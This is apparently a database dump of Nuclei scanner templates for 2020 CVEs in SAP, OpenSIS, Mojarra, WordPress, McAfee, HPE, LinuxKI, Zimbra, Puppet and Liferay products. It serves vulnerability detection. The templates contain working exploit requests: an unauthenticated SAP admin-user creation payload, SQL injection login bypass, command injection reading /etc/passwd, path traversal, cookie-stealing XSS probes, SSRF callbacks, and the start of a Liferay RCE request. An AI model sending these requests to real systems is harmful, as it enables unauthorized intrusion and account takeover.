https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf\n - https://github.com/chipik/SAP_EEM_CVE-2020-6207\n - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/\n - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6207\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-6207\n cwe-id: CWE-306\n epss-score: 0.97437\n epss-percentile: 0.99941\n cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: solution_manager\n tags: cve2020,cve,sap,solman,rce,kev\n\nhttp:\n - raw:\n - |\n POST /EemAdminService/EemAdmin HTTP/1.1\n Host: {{Hostname}}\n SOAPAction: \"\"\n Content-Type: text/xml; charset=UTF-8\n Connection: close\n\n \n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \":Envelope\"\n - \":Body\"\n - \":getAllAgentInfoResponse\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n - \"SAP NetWeaver Application Server\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206f10f6390a1f28d284757ba7222f8e714ac03076c664a8120f972e03a1f21b0e022076e4a6fb68aa6b3cf516332820510096fc1215afa44a1de9d081510ecac38195:922c64590222798bb761d5b6d8e72950", "hash": "4025d22d24cf6e0a2084788f8cdf0dca", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822e" }, "name": "CVE-2020-6287.yaml", "content": "id: CVE-2020-6287\n\ninfo:\n name: SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition\n author: dwisiswant0\n severity: critical\n description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to gain unauthorized administrative access to the SAP system.\n remediation: |\n Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability.\n reference:\n - https://launchpad.support.sap.com/#/notes/2934135\n - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675\n - https://www.onapsis.com/recon-sap-cyber-security-vulnerability\n - https://github.com/chipik/SAP_RECON\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6287\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2020-6287\n cwe-id: CWE-306\n epss-score: 0.97502\n epss-percentile: 0.99977\n cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: netweaver_application_server_java\n shodan-query: http.favicon.hash:-266008933\n tags: cve,cve2020,sap,kev\n\nhttp:\n - raw:\n - |\n POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml; charset=UTF-8\n Connection: close\n\n sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\n CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n userDetails\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"CTCWebServiceSi\"\n - \"SOAP-ENV\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n - \"SAP NetWeaver Application Server\"\n\n - type: status\n status:\n - 200\n\n# userName - sapRpoc6351\n# password - Secure!PwD8890\n# digest: 490a0046304402206c4b14491ea982f8a08dec5bcee88849e6ebc6b36ce428baa9d12c28e5893bb6022032ff0dcf67cb9db8e3042c6245bb9c3aa286d537c7f1c46e8a741f955b60bcb7:922c64590222798bb761d5b6d8e72950", "hash": "15a4c8e0674f8ea837bcd8b0e70c45d1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822f" }, "name": "CVE-2020-6308.yaml", "content": "id: CVE-2020-6308\n\ninfo:\n name: SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery\n author: madrobot\n severity: medium\n description: |\n SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks.\n remediation: |\n Apply the relevant security patches provided by SAP to mitigate this vulnerability.\n reference:\n - https://github.com/InitRoot/CVE-2020-6308-PoC\n - https://launchpad.support.sap.com/#/notes/2943844\n - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6308\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-6308\n cwe-id: CWE-918\n epss-score: 0.004\n epss-percentile: 0.73121\n cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: businessobjects_business_intelligence_platform\n tags: cve2020,cve,sap,ssrf,oast,unauth\n\nhttp:\n - raw:\n - |\n POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: location\n words:\n - \"{{BaseURL}}/AdminTools/querybuilder/logonform.jsp\"\n# digest: 4a0a0047304502206fcb723e77d14f6dfba93f21bf79b8017cfc96c4e7d4e0fbfa8fbf743a53cb9d022100b1dc9f0cc68fc6eceb0f30bbef24ce3526fed3c2fc7b3a2c9dc58a315871a212:922c64590222798bb761d5b6d8e72950", "hash": "7f7662d58557d3209b0d30bfd213f307", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308230" }, "name": "CVE-2020-6637.yaml", "content": "id: CVE-2020-6637\n\ninfo:\n name: OpenSIS 7.3 - SQL Injection\n author: pikpikcu\n severity: critical\n description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of OpenSIS.\n reference:\n - https://cinzinga.com/CVE-2020-6637/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6637\n - https://sourceforge.net/projects/opensis-ce/files/\n - https://github.com/OS4ED/openSIS-Responsive-Design/commit/1127ae0bb7c3a2883febeabc6b71ad8d73510de8\n - https://opensis.com/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-6637\n cwe-id: CWE-89\n epss-score: 0.02067\n epss-percentile: 0.87871\n cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:*\n metadata:\n max-request: 3\n vendor: os4ed\n product: opensis\n shodan-query: http.title:\"openSIS\"\n tags: cve,cve2020,sqli,opensis,os4ed\n\nhttp:\n - method: POST\n path:\n - '{{BaseURL}}/account/index.php'\n - '{{BaseURL}}/opensis/index.php'\n - '{{BaseURL}}/index.php'\n\n body: |\n USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'SQL STATEMENT:'\n - \"UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022018750f0e8502dd291ed8d45bff59f86bec81babc9ea9b413e6447a90544c50de022100ab7a78866d15bc653144d93e47bf47daea15d96bee6b942339ef913d90181e9f:922c64590222798bb761d5b6d8e72950", "hash": "1c746fcc0af9078c51e2b1455dd100ca", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308231" }, "name": "CVE-2020-6950.yaml", "content": "id: CVE-2020-6950\n\ninfo:\n name: Eclipse Mojarra - Local File Read\n author: iamnoooob,pdresearch\n severity: medium\n description: |\n Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.\n reference:\n - https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741\n - https://github.com/eclipse-ee4j/mojarra/issues/4571\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6950\n - https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943\n - https://www.oracle.com/security-alerts/cpuapr2022.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-6950\n cwe-id: CWE-22\n epss-score: 0.03924\n epss-percentile: 0.91792\n cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: eclipse\n product: mojarra\n shodan-query: html:\"javax.faces.resource\"\n fofa-query: body=\"javax.faces.ViewState\"\n tags: cve,cve2020,mojarra,lfi,eclipse\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF\"\n - \"{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF\"\n - \"{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF\"\n - \"{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF\"\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(header, \"application/xml\")'\n - 'contains_all(body, \"\") || contains_all(body, \"\")'\n condition: and\n# digest: 490a00463044022057bb165b69bcd6a648332fd9637fcd2daef818312700aca402b735e74e3bab7a022039da250736c313317b03ff12fb722f320b0ecfd1338eab919975feb262de5717:922c64590222798bb761d5b6d8e72950", "hash": "03a4f2695e5f94319771cfeaa935fc99", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308232" }, "name": "CVE-2020-7107.yaml", "content": "id: CVE-2020-7107\n\ninfo:\n name: WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: Fixed in version 1.8.30.\n reference:\n - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33\n - https://wordpress.org/plugins/ultimate-faqs/\n - https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7107\n - https://wordpress.org/plugins/ultimate-faqs/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-7107\n cwe-id: CWE-79\n epss-score: 0.00395\n epss-percentile: 0.70653\n cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: etoilewebdesign\n product: ultimate_faq\n framework: wordpress\n tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Ultimate FAQ'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'\"\n - \"var Display_FAQ_ID =\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a98c36c0d43554a80a17b855979ba9b1afd278daecb5f8105fca20d49ac064d4022100b582ef9291592f99197ce65d483f2f18702a4dace55e3b8e7f2fd8626364c8ac:922c64590222798bb761d5b6d8e72950", "hash": "6883a35e94b42b178e483be515a0f469", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308233" }, "name": "CVE-2020-7136.yaml", "content": "id: CVE-2020-7136\n\ninfo:\n name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access\n author: gy741\n severity: critical\n description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.\n impact: |\n An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system.\n remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).\n reference:\n - https://www.tenable.com/security/research/tra-2020-02\n - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7136\n - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7136\n cwe-id: CWE-288\n epss-score: 0.26929\n epss-percentile: 0.96662\n cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hpe\n product: smart_update_manager\n tags: cve,cve2020,hp,auth-bypass,hpe,tenable\n\nhttp:\n - raw:\n - |\n POST /session/create HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n - |\n GET /session/{{sessionid}}/node/index HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: body\n words:\n - \"hmessage\"\n - \"Command completed successfully.\"\n - \"node_name\"\n condition: and\n\n extractors:\n - type: regex\n name: sessionid\n group: 1\n regex:\n - '\"sessionId\":\"([a-z0-9.]+)\"'\n internal: true\n part: body\n# digest: 4a0a004730450221009f65af7463005817eaf2c8b1d20ecc91865dc0bc33b2e3eb7d8ee11b885a7a7a02207baf70efdf4cb2b174edd1bb6a8c71233fb6f7d3c54f74aa1b93db5446ddb5a2:922c64590222798bb761d5b6d8e72950", "hash": "34ff62fcab95765005f4305ea2c0a834", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308234" }, "name": "CVE-2020-7209.yaml", "content": "id: CVE-2020-7209\n\ninfo:\n name: LinuxKI Toolset <= 6.01 - Remote Command Execution\n author: dwisiswant0\n severity: critical\n description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: This is resolved in release 6.0-2.\n reference:\n - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html\n - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html\n - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2\n - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78\n - https://www.hpe.com/us/en/home.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7209\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7209\n epss-score: 0.97202\n epss-percentile: 0.99806\n cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: linuxki\n tags: cve,cve2020,rce,packetstorm,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a004730450221008918f007005c4bd18c47d5bd3d0b1d74255d1ec310d880c39358415ae1b283d5022004aa9c23cc199e0a314102ed9d1ce95519a69938084464c7146e9a8b5e8bc434:922c64590222798bb761d5b6d8e72950", "hash": "27a8b184551f322e5826eec119f0d476", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308235" }, "name": "CVE-2020-7318.yaml", "content": "id: CVE-2020-7318\n\ninfo:\n name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting\n author: dwisiswant0\n severity: medium\n description: |\n McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.\n reference:\n - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/\n - https://kc.mcafee.com/corporate/index?page=content&id=SB10332\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7318\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions.\n remediation: |\n Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability.\n reference:\n - https://kc.mcafee.com/corporate/index?page=content&id=SB10332\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.3\n cve-id: CVE-2020-7318\n cwe-id: CWE-79\n epss-score: 0.00065\n epss-percentile: 0.26966\n cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mcafee\n product: epolicy_orchestrator\n tags: cve,cve2020,xss,mcafee\n\nhttp:\n - raw:\n - |\n GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"Policy Name\"\n - \"'\\\">\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202d1cb22987ed6f50f9a8450307b04fb97cb6b3c321c80b9f0488e23e96fcb37f02204df7d0479846817a8336b7fcafe8afda2777f7e03883335b649b88afa68341cc:922c64590222798bb761d5b6d8e72950", "hash": "075470d31a7eb3e1c2b6871d64a4572b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308236" }, "name": "CVE-2020-7796.yaml", "content": "id: CVE-2020-7796\n\ninfo:\n name: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery\n author: gy741\n severity: critical\n description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability.\n reference:\n - https://www.adminxe.com/2183.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7796\n - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7796\n cwe-id: CWE-918\n epss-score: 0.70648\n epss-percentile: 0.9795\n cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: synacor\n product: zimbra_collaboration_suite\n tags: cve,cve2020,zimbra,ssrf,oast,synacor\n\nhttp:\n - raw:\n - |\n GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100c32049f90bd86f8d7752cf970acd2afd5150fb0a7d5ffd4b42477b733a9fdb0c022100ad42c6fbacd75f19232f08f7c3590d37f61dc7931ccc81dd74992232dd9633e3:922c64590222798bb761d5b6d8e72950", "hash": "a6b93f656bafaf2aeeb6d41ff235e917", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308237" }, "name": "CVE-2020-7943.yaml", "content": "id: CVE-2020-7943\n\ninfo:\n name: Puppet Server/PuppetDB - Sensitive Information Disclosure\n author: c-sh0\n severity: high\n description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information stored in Puppet Server/PuppetDB.\n remediation: |\n Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected.\n reference:\n - https://puppet.com/security/cve/CVE-2020-7943\n - https://tickets.puppetlabs.com/browse/PDB-4876\n - https://puppet.com/security/cve/CVE-2020-7943/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7943\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-7943\n cwe-id: CWE-276,NVD-CWE-noinfo\n epss-score: 0.08068\n epss-percentile: 0.93691\n cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: puppet\n product: puppet_enterprise\n tags: cve2020,cve,puppet,exposure,puppetdb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/metrics/v1/mbeans\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"trapperkeeper\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206792db6fdd8e464da8351b87ddbba9a963f88f46d4f033c091fe6c389244575d022100fba0ea89c7927a275a26e5c8af022bbc1396176d3062c626ebf54a7fd9215679:922c64590222798bb761d5b6d8e72950", "hash": "bae975c3a7363c9c67fa8ba0c3766b3c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308238" }, "name": "CVE-2020-7961.yaml", "content": "id: CVE-2020-7961\n\ninfo:\n name: Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).\n remediation: |\n Upgrade Liferay Portal to version 7.2.1 CE GA2 or later to mitigate the vulnerability.\n reference:\n - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html\n - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html\n - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7961\n - http://packetstormsecurity.com/files/157254/Liferay-Portal-Java-Unmarshalling-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7961\n cwe-id: CWE-502\n epss-score: 0.97342\n epss-percentile: 0.99876\n cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:*\n metadata:\n max-request: 2\n vendor: liferay\n product: liferay_portal\n tags: cve2020,cve,packetstorm,rce,liferay,kev\n\nhttp:\n - raw:\n - |\n POST /api/jsonws/invoke HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\n cmd2: {{command}}\n\n 